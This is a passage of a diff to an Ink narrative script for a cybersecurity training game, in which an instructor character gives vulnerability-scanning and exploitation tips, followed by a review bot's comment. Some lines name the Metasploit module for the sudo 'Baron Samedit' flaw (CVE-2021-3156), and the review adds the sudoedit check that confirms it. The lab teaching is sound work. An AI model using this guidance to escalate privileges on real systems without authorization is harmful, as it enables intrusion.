+ + Vulnerability Assessment Specialist: You may need to upgrade your shell to Meterpreter first to use the Metasploit exploit. + + Vulnerability Assessment Specialist: Search Metasploit: search baron_samedit or search CVE-2021-3156 + + Vulnerability Assessment Specialist: Use: exploit/linux/local/sudo_baron_samedit + + ~ instructor_rapport += 5 + ++ [Troubleshooting tips?] + Vulnerability Assessment Specialist: If Nessus gives API access errors, clear your browser cache (Ctrl+Shift+Delete) + + Vulnerability Assessment Specialist: If you can't access a web server, check Firefox proxy settings - disable the proxy or add exclusion for 10.*.*.* + + Vulnerability Assessment Specialist: Some vulnerable services might be patched - try attacking all available services. + + Vulnerability Assessment Specialist: Nessus scans can take 15-30 minutes - be patient! + + Vulnerability Assessment Specialist: Compare results across all tools to see their different strengths and blind spots. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== ready_for_practice === +Vulnerability Assessment Specialist: Excellent! You're ready for comprehensive vulnerability assessment. + +~ instructor_rapport += 10 +~ vuln_scanning_mastery += 10 + +Vulnerability Assessment Specialist: You'll use multiple industry-standard tools to assess the same target and compare their effectiveness. + +Vulnerability Assessment Specialist: This lab demonstrates an important lesson: no single tool catches everything. Layer your defenses and your assessments! + +Vulnerability Assessment Specialist: Remember: vulnerability scanners are reconnaissance tools. Use them only on authorized targets. + ++ [Any final advice?] + Vulnerability Assessment Specialist: Be systematic. Run all the tools, document findings, and compare results. + + Vulnerability Assessment Specialist: Pay attention to what each tool finds that others miss - this teaches you their strengths and weaknesses. 
+ + Vulnerability Assessment Specialist: Don't just collect scan results - verify critical findings by actually exploiting them. + + Vulnerability Assessment Specialist: The limitations of these tools are as important as their capabilities. Real attackers won't stop at what scanners find. + + Vulnerability Assessment Specialist: Take notes on severity ratings, CVE numbers, and remediation advice - these make great report content. + + Vulnerability Assessment Specialist: Good luck, Agent {player_name}. Time to see what automated tools can and can't detect! + + ~ instructor_rapport += 10 + +- -> vuln_scan_hub + +-> END
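Review bot: The privilege-escalation tips (the "Tips for exploiting found vulnerabilities?" and "Tips for privilege escalation?" choices in `challenge_tips`) tell the player to decide that CVE-2021-3156 "might be present" from `sudo --version` alone, which is exactly the backported-patch false positive that `tool_limitations` warns about a few knots earlier. Suggest adding one line after "check the sudo version: sudo --version" pointing at the behavioural test from the Qualys advisory, e.g. `Vulnerability Assessment Specialist: Confirm it rather than trusting the version string: run sudoedit -s / as an unprivileged user. A vulnerable sudo answers "sudoedit: /: not a regular file"; a patched one prints the usage message.` so the narrative practises what it preaches. Separately, these knots read `instructor_rapport`, `vuln_scanning_mastery` and `player_name`; none are declared in this hunk, so confirm the `VAR` lines exist at the top of the file or in an INCLUDEd file, otherwise inklecate rejects the scenario.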